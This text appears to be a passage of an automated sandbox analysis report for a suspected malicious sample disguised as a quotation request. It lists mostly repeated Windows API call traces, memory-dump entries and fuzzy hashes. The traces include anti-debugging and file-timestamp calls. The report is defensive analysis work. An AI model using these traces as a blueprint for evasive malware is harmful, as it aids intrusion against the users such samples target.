                                                                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00404432
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: IconNotifyShell_$_memset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1505330794-0
                                                                                                                                                                                                                              • Opcode ID: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                                                                                                                                                                                                              • Instruction ID: 448a70bf35e4549ae47872dc9eb977fea889799f7ce089bf6dae1479d4278b9a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E3184B05047019FD760DF24D884A9BBBF8FB98308F00093FEA9A92391D7746944CB5A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                                                                                                                                                                • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A192
                                                                                                                                                                                                                                • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A19C
                                                                                                                                                                                                                              • __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                                                                                                                                                                • Part of subcall function 0042A1C8: GetModuleFileNameW.KERNEL32(00000000,004C33BA,00000104,00000000,00000001,00000000), ref: 0042A25A
                                                                                                                                                                                                                                • Part of subcall function 0042A1C8: ___crtMessageBoxW.LIBCMT ref: 0042A308
                                                                                                                                                                                                                                • Part of subcall function 0042309F: ___crtCorExitProcess.LIBCMT ref: 004230A5
                                                                                                                                                                                                                                • Part of subcall function 0042309F: ExitProcess.KERNEL32 ref: 004230AE
                                                                                                                                                                                                                                • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00C30000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1372826849-0
                                                                                                                                                                                                                              • Opcode ID: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                                                                                                                                                                                                              • Instruction ID: 12628286b9c33790f0bcaf27d243d0f78d5a939af01e39ac9af769d2403f214a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8101D235380B31DADA102B36BC42A2E67588BC2766FD0043FF9059A281DE7C9D01866D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
                                                                                                                                                                                                                              • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3397143404-0
                                                                                                                                                                                                                              • Opcode ID: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                                                                                                                                                                                                              • Instruction ID: c759ec0fed9c3a555ac5ec6521767d99e991bc38b38178bd45d0c2782cb34c4e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6EE08632140214B7D7212B54EC0DFDE7B19EB06760F144535FF14A90E087B12925979C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00468D1B
                                                                                                                                                                                                                                • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                                                                                                                                                                                                                • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00468D2C
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00468D3E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: bee81b5e5e3cd578fde5cdb6867b4e945c3d38cd80081bd24aec34fd9e465f35
                                                                                                                                                                                                                              • Instruction ID: 6b151060fb8ed88ed9ffdc5938a612973e117ec8253147f08314cae1c0c73c84
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bee81b5e5e3cd578fde5cdb6867b4e945c3d38cd80081bd24aec34fd9e465f35
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10E0C2B170171253CB20A579BA40A8313DC4F4C3967440A0FB40DD7282DEACF842803C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: CALL
                                                                                                                                                                                                                              • API String ID: 0-4196123274
                                                                                                                                                                                                                              • Opcode ID: 7c4522afcc273417d4d8c93b72e25257d5254b3c436acfa90849ee5902d5bb5e
                                                                                                                                                                                                                              • Instruction ID: c803bb07f2a617980fc862d1973d54e65b33ee20ceb4547c7cbfd92c67e19f3b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c4522afcc273417d4d8c93b72e25257d5254b3c436acfa90849ee5902d5bb5e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A225B70608301DFD724DF14C454A6AB7E1FF44308F15896EE98AAB3A2D739EC55CB8A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00465B93
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BuffCharLower
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2358735015-0
                                                                                                                                                                                                                              • Opcode ID: b313abd93a3c89839d601e5652de73f9a51ced68dd4fda3e40e6ac1f928fdb91
                                                                                                                                                                                                                              • Instruction ID: ca699bb1c278210e2bea96785600e82950db412e583262dd6e63fce83db42ac8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b313abd93a3c89839d601e5652de73f9a51ced68dd4fda3e40e6ac1f928fdb91
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0441A2B2500709AFDB11DF65C8809AFB3B8EB44314F10862FE956D7281EB78AE01CB55
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00AE55C0,?,00000000,00000000), ref: 00AE5A51
                                                                                                                                                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 00AE5B11
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Thread$CreateExitUser
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4108186749-0
                                                                                                                                                                                                                              • Opcode ID: 3f1f053f16ba8aba2f251c4034cec7d42268b25d08dbaeada75da9f8eed2cb01
                                                                                                                                                                                                                              • Instruction ID: 4c0e890f41b165d1405dfb9384ffdda4ba42f96ee39974d860ac71d66c7052f7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f1f053f16ba8aba2f251c4034cec7d42268b25d08dbaeada75da9f8eed2cb01
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB113D11D0DBC14ED723877A68753666FA01FA3738F1D06DAD0908E0E3D2995D0D93A3
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • IsThemeActive.UXTHEME ref: 00404834
                                                                                                                                                                                                                                • Part of subcall function 0042336C: __lock.LIBCMT ref: 00423372
                                                                                                                                                                                                                                • Part of subcall function 0042336C: DecodePointer.KERNEL32(00000001,?,00404849,00457C74), ref: 0042337E
                                                                                                                                                                                                                                • Part of subcall function 0042336C: EncodePointer.KERNEL32(?,?,00404849,00457C74), ref: 00423389
                                                                                                                                                                                                                                • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915
                                                                                                                                                                                                                                • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040492A
                                                                                                                                                                                                                                • Part of subcall function 00403B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                                                                                                                                                                                                • Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                                                                                                                                                                                                • Part of subcall function 00403B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                                                                                                                                                                                                • Part of subcall function 00403B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1438897964-0
                                                                                                                                                                                                                              • Opcode ID: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                                                                                                                                                                                                              • Instruction ID: 9525eea27cfe2a06ee6bb0b94f8a439f0fec78f72a1223afaaa4f4cc7b3f6ca0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96118E729143019BC700EF69E80591EBBE8EB95754F10893FF440932B2DB749A49CB9E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 00405CC7
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 0043DD73
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                              • Opcode ID: aed05ab6a1b88559d57bbe8f1293197c90d85f92c05dbd21c07c0e87b90c3386
                                                                                                                                                                                                                              • Instruction ID: 3e9ad2372c7cfb2b297ed5c82f770502f6fc7a31e1f40b0728b8e52e39df89fe
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aed05ab6a1b88559d57bbe8f1293197c90d85f92c05dbd21c07c0e87b90c3386
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A018870144708BEF7201E24CC8AF673ADCEB05768F10832AFAD56A1D0C6B81C458F58
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                                                                                                                                                                • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                                                                                                                                                                • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00C30000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 00420DEC
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                                                                                                                                                                • Part of subcall function 0042859B: RaiseException.KERNEL32(?,?,00000000,004B9E78,?,00000001,?,?,?,00420E06,00000000,004B9E78,00409E8C,00000001), ref: 004285F0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3902256705-0
                                                                                                                                                                                                                              • Opcode ID: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                                                                                                                                                                                                                              • Instruction ID: 7ce0db18d3e86308d2e94e4ef4c1f65fcbea9f9514d772724804ad69f7891851
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BAF0863560223976CB10BA95FD015DF7BE89F01315F90452FF90496282DFB89A8091DD
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __lock_file_memset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 26237723-0
                                                                                                                                                                                                                              • Opcode ID: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
                                                                                                                                                                                                                              • Instruction ID: eb59cd814e1449f2521413b7bdb600bd306f3e119aeaedc73612e9d55c5f6ff2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B901D871A01624ABCF21AF66BC0259F7B61AF50325FD0411FB81817251DB398551DF59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                                                                                                                                                              • __lock_file.LIBCMT ref: 004253EB
                                                                                                                                                                                                                                • Part of subcall function 00426C11: __lock.LIBCMT ref: 00426C34
                                                                                                                                                                                                                              • __fclose_nolock.LIBCMT ref: 004253F6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2800547568-0
                                                                                                                                                                                                                              • Opcode ID: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                                                                                                                                                                                                              • Instruction ID: fafcd99f2ade88ab86af259f2ce8aa17897398df1327fb2dd29172a4384519b5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56F09C71B026249AD710BF66780579D66E06F41378FA1914FE814E71C1CFBC49419B5E
                                                                                                                                                                                                                              APIs
